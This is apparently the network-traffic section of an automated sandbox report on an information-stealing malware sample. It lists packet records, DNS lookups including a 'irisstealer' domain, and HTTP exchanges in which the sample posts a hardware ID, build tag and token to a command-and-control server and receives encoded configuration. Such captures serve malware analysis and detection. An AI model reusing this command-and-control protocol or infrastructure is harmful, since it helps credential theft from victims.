                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.392931938 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.393771887 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.393789053 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.393848896 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.394752026 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.394799948 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.395742893 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.395803928 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.395821095 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.395880938 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.395919085 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.396773100 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.396848917 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.397569895 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.397622108 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.397821903 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.397849083 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.397891998 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.398840904 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.398858070 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.398920059 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.399895906 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.399966002 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.400559902 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.400631905 CET49843443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.400669098 CET44349843172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.400727987 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.400754929 CET49843443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.400799036 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.401009083 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.401254892 CET49844443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.401297092 CET44349844172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.401359081 CET49844443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.401554108 CET49843443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.401566982 CET44349843172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.401801109 CET49844443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.401817083 CET44349844172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.401839972 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.401858091 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.401874065 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.401894093 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:43.401913881 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:21.374876022 CET192.168.2.71.1.1.10xb04cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:21.375046968 CET192.168.2.71.1.1.10x16d9Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.479075909 CET192.168.2.71.1.1.10xcbf8Standard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.479217052 CET192.168.2.71.1.1.10x6ce8Standard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.696778059 CET192.168.2.71.1.1.10x4810Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.696952105 CET192.168.2.71.1.1.10x837bStandard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.920672894 CET192.168.2.71.1.1.10x36e0Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.921222925 CET192.168.2.71.1.1.10xb6a4Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.553816080 CET192.168.2.71.1.1.10x9b60Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.554280043 CET192.168.2.71.1.1.10x668eStandard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.990950108 CET192.168.2.71.1.1.10x717eStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.991188049 CET192.168.2.71.1.1.10x82dfStandard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.732127905 CET192.168.2.71.1.1.10x8ce7Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.732342005 CET192.168.2.71.1.1.10x27c3Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.732973099 CET192.168.2.71.1.1.10xedadStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.733326912 CET192.168.2.71.1.1.10x8659Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.739454031 CET192.168.2.71.1.1.10x5e5eStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.739706993 CET192.168.2.71.1.1.10x5341Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.130578041 CET192.168.2.71.1.1.10xd367Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.130975962 CET192.168.2.71.1.1.10x9c27Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.144669056 CET192.168.2.71.1.1.10xf6deStandard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.144961119 CET192.168.2.71.1.1.10xccf9Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.270323992 CET192.168.2.71.1.1.10x9642Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.270488024 CET192.168.2.71.1.1.10xbf70Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.412024975 CET192.168.2.71.1.1.10x7825Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.412214994 CET192.168.2.71.1.1.10x1d84Standard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:07:28.814991951 CET192.168.2.71.1.1.10xc243Standard query (0)store1.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:07:31.420689106 CET192.168.2.71.1.1.10x2666Standard query (0)file4.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:08:13.807809114 CET192.168.2.71.1.1.10x94bdStandard query (0)script.irisstealer.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:21.512264967 CET1.1.1.1192.168.2.70xb04cNo error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:21.512320995 CET1.1.1.1192.168.2.70x16d9No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.617980957 CET1.1.1.1192.168.2.70xcbf8No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.617980957 CET1.1.1.1192.168.2.70xcbf8No error (0)plus.l.google.com172.217.17.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:28.619357109 CET1.1.1.1192.168.2.70x6ce8No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:29.836844921 CET1.1.1.1192.168.2.70x4810No error (0)play.google.com172.217.19.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:34.955547094 CET1.1.1.1192.168.2.70x4f68No error (0)l-0007.l-dc-msedge.net13.107.43.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.059169054 CET1.1.1.1192.168.2.70x36e0No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.059669971 CET1.1.1.1192.168.2.70xb6a4No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.534563065 CET1.1.1.1192.168.2.70xb76dNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.534563065 CET1.1.1.1192.168.2.70xb76dNo error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:35.715497971 CET1.1.1.1192.168.2.70x22feNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.691942930 CET1.1.1.1192.168.2.70x9b60No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:37.692033052 CET1.1.1.1192.168.2.70x668eNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:38.128297091 CET1.1.1.1192.168.2.70x717eNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:38.128297091 CET1.1.1.1192.168.2.70x717eNo error (0)googlehosted.l.googleusercontent.com172.217.19.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:38.129192114 CET1.1.1.1192.168.2.70x82dfNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.869529963 CET1.1.1.1192.168.2.70x27c3No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.869543076 CET1.1.1.1192.168.2.70x8ce7No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.869543076 CET1.1.1.1192.168.2.70x8ce7No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.870553970 CET1.1.1.1192.168.2.70xedadNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.870553970 CET1.1.1.1192.168.2.70xedadNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.870578051 CET1.1.1.1192.168.2.70x8659No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.876473904 CET1.1.1.1192.168.2.70x5e5eNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.876473904 CET1.1.1.1192.168.2.70x5e5eNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:39.877579927 CET1.1.1.1192.168.2.70x5341No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.268595934 CET1.1.1.1192.168.2.70xd367No error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.268595934 CET1.1.1.1192.168.2.70xd367No error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.268595934 CET1.1.1.1192.168.2.70xd367No error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.268595934 CET1.1.1.1192.168.2.70xd367No error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.282299995 CET1.1.1.1192.168.2.70xccf9No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.283088923 CET1.1.1.1192.168.2.70xf6deNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.407305956 CET1.1.1.1192.168.2.70x9642No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.407695055 CET1.1.1.1192.168.2.70xbf70No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.549655914 CET1.1.1.1192.168.2.70x7825No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:40.550668001 CET1.1.1.1192.168.2.70x1d84No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.687988043 CET1.1.1.1192.168.2.70xc461No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.687988043 CET1.1.1.1192.168.2.70xc461No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:07:29.192112923 CET1.1.1.1192.168.2.70xc243No error (0)store1.gofile.io45.112.123.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:07:31.636217117 CET1.1.1.1192.168.2.70x2666No error (0)file4.gofile.io45.112.123.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:08:14.034023046 CET1.1.1.1192.168.2.70x94bdNo error (0)script.irisstealer.xyz172.67.142.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:08:14.034023046 CET1.1.1.1192.168.2.70x94bdNo error (0)script.irisstealer.xyz104.21.71.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    0192.168.2.749706185.215.113.206805788C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:12.987978935 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:14.418906927 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:14 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:14.423376083 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----HDAKFCGIJKJKFHIDHIII
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Content-Length: 211
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 42 44 32 41 32 30 46 30 45 35 34 33 32 30 37 36 30 33 31 36 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                    Data Ascii: ------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="hwid"3BD2A20F0E543207603164------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="build"mars------HDAKFCGIJKJKFHIDHIII--
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:14.897661924 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:14 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Content-Length: 180
                                                                                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Data Raw: 4f 47 45 7a 59 54 55 30 5a 47 4d 32 4e 47 5a 68 59 57 51 32 5a 6a 68 6d 4e 6a 4e 6c 5a 6a 59 78 4d 6d 45 77 59 6d 4d 35 4f 44 45 7a 4d 6a 63 7a 4f 44 46 6d 4f 57 45 7a 5a 44 6b 77 4e 6a 4a 6b 4d 44 51 34 4e 7a 6b 33 5a 44 4e 6c 5a 44 55 35 4d 6d 4d 30 5a 44 6c 6d 59 32 5a 6b 5a 44 49 31 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                                                                                                                                                                                                                                                    Data Ascii: OGEzYTU0ZGM2NGZhYWQ2ZjhmNjNlZjYxMmEwYmM5ODEzMjczODFmOWEzZDkwNjJkMDQ4Nzk3ZDNlZDU5MmM0ZDlmY2ZkZDI1fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:14.899065971 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----BAEHIEBGHDAFIEBGIEHJ
                                                                                                                                                                                                                                                                                                                    Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                                    Content-Length: 268
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 42 41 45 48 49 45 42 47 48 44 41 46 49 45 42 47 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 61 33 61 35 34 64 63 36 34 66 61 61 64 36 66 38 66 36 33 65 66 36 31 32 61 30 62 63 39 38 31 33 32 37 33 38 31 66 39 61 33 64 39 30 36 32 64 30 34 38 37 39 37 64 33 65 64 35 39 32 63 34 64 39 66 63 66 64 64 32 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 48 49 45 42 47 48 44 41 46 49 45 42 47 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 48 49 45 42 47 48 44 41 46 49 45 42 47 49 45 48 4a 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                    Data Ascii: ------BAEHIEBGHDAFIEBGIEHJContent-Disposition: form-data; name="token"8a3a54dc64faad6f8f63ef612a0bc981327381f9a3d9062d048797d3ed592c4d9fcfdd25------BAEHIEBGHDAFIEBGIEHJContent-Disposition: form-data; name="message"browsers------BAEHIEBGHDAFIEBGIEHJ--
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:15.362014055 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:15 GMT
                                                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Content-Length: 2028
                                                                                                                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED]
